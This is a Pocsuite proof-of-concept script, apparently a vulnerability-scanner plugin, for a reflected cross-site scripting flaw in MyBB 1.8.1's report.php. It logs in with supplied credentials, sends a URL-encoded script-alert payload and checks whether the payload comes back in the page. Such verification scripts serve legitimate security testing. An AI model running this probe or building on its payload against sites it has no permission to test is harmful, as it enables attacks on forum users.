MyBB 1.8.1 /report.php 跨站脚本漏洞

                                                #!/usr/bin/env python
# coding: utf-8

import re

from pocsuite.net import req
from pocsuite.poc import POCBase, Output
from pocsuite.utils import register

# This poc requires a valid username and it's password to work
# Users can register one manually.


class TestPOC(POCBase):
    vulID = '1672'  # vul ID
    version = '1'
    author = ['王畅']
    vulDate = '2014-11-13'
    createDate = '2014-12-09'
    updateDate = '2014-12-09'
    references = ['http://www.exploit-db.com/exploits/35224/']
    name = 'MyBB 1.8.1 /report.php 跨站脚本漏洞 POC'
    appPowerLink = 'http://www.mybb.com/'
    appName = 'MyBB'
    appVersion = '1.8.1'
    vulType = 'Cross Site Scripting'
    desc = '''
    MyBB 1.8.1 /report.php 过滤不严谨导致XSS漏洞的产生。
    '''
    # the sample sites for examine
    samples = ['']



    def _verify(self):
        result = {}
        target_url = '/report.php?type=XSS%22%3E%3Cscript%3Ealert(666)%3C%2Fscript%3E%26pid%3D1'
        s = req.session()
        s.get(self.url)
        login_data = {
            'action': 'do_login',
            'url': self.url,
            'quick_login': '1',
            'quick_username': self.params.username,
            'quick_password': self.params.password,
            'quick_remember': 'yes',
            'submit': 'Login'
        }
        s.post(self.url+'/member.php', data=login_data)
        response = s.get(self.url + target_url)
        content = response.content
        match = re.search('<script>alert\(666\)</script>', content)
        if match:
            result['VerifyInfo'] = {}
            result['VerifyInfo']['URL'] = self.url + target_url

        return self.parse_attack(result)


    def _attack(self):
        return self._verify()


    def parse_attack(self, result):
        output = Output(self)

        if result:
            output.success(result)
        else:
            output.fail('Internet Nothing returned')

        return output


register(TestPOC)